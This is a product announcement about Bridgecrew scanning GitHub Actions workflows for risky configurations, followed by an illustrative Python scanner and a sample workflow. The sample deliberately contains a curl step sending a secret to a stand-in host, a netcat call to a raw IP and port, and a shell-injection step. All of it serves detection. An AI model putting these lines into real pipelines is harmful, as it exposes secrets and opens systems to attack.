GitHub Actions workflow configuration scan results in Bridgecrew ⚡

Bridgecrew now automatically scans and identifies misconfigurations in any GitHub Actions workflow files that are found in onboarded repositories. CLI results will also appear in the platform when scans are performed locally or in a CI pipeline.

Onboarded repositories that have GitHub Actions workflow files found in the .github directory will be scanned for configurations that could expose a pipeline to attack, such as secrets exfiltration and code injection. The new policies include:

  • Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn't true on environment variables
  • Ensure run commands are not vulnerable to shell injection
  • Suspicious use of curl with secrets
  • Suspicious use of netcat with IP address
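As an added illustration, not Bridgecrew's or Checkov's own policy code, the following stdlib-only Python scanner applies simplified versions of these four checks to a constructed workflow file; the policy names, regexes and the block-scalar handling are this example's own assumptions. The last step in the sample shows the pattern the shell-injection policy steers towards: the untrusted expression is passed through `env` and quoted in the shell rather than expanded into the command text.

```python
import re
SAMPLE_WORKFLOW = """\
on: [issues, push]
env:
  ACTIONS_ALLOW_UNSECURE_COMMANDS: true
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "Issue title: ${{ github.event.issue.title }}"
      - run: curl -d "token=${{ secrets.API_TOKEN }}" https://example.invalid/collect
      - run: nc 203.0.113.10 4444
      - run: |
          echo "$TITLE"
        env:
          TITLE: ${{ github.event.issue.title }}
"""  # constructed sample workflow, not from the page; the last step is the safe pattern

RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")                  # `run:` key, any list indent
UNTRUSTED = re.compile(r"\$\{\{\s*github\.(?:event\.|head_ref)")      # attacker-influenced contexts
SECRET = re.compile(r"\$\{\{\s*secrets\.")
UNSECURE = re.compile(r"ACTIONS_ALLOW_UNSECURE_COMMANDS\s*:\s*['\"]?true['\"]?")
NETCAT_IP = re.compile(r"\b(?:nc|ncat|netcat)\b.*\b(?:\d{1,3}\.){3}\d{1,3}\b")

def check_run_command(cmd):  # policies (hypothetical names) one shell command line violates
    hits = []
    if UNTRUSTED.search(cmd):
        hits.append("SHELL_INJECTION")    # expression expanded straight into the shell
    if "curl" in cmd and SECRET.search(cmd):
        hits.append("CURL_WITH_SECRETS")  # secret may leave the runner over HTTP
    if NETCAT_IP.search(cmd):
        hits.append("NETCAT_WITH_IP")     # raw socket to a hard-coded address
    return hits

def scan_workflow(text):  # line-based scan; returns (policy, line_no) pairs, 1-indexed
    findings, run_indent = [], None   # run_indent: indent of a `run: |` key while inside its block
    for no, line in enumerate(text.splitlines(), 1):
        if UNSECURE.search(line):
            findings.append(("ACTIONS_ALLOW_UNSECURE_COMMANDS", no))
        m = RUN_KEY.match(line)
        if m:
            cmd = m.group(2).strip()
            run_indent = len(m.group(1)) if cmd in ("|", ">", "|-", ">-") else None
            findings += [(p, no) for p in check_run_command(cmd)]
        elif run_indent is not None and line.strip():
            if len(line) - len(line.lstrip()) <= run_indent:
                run_indent = None                       # dedented: block scalar ended
            else:
                findings += [(p, no) for p in check_run_command(line)]
    return findings
```

Running `scan_workflow(SAMPLE_WORKFLOW)` reports one finding per offending line and nothing for the `env`-indirected step, which is the behaviour a workflow author should expect from the corresponding platform policies.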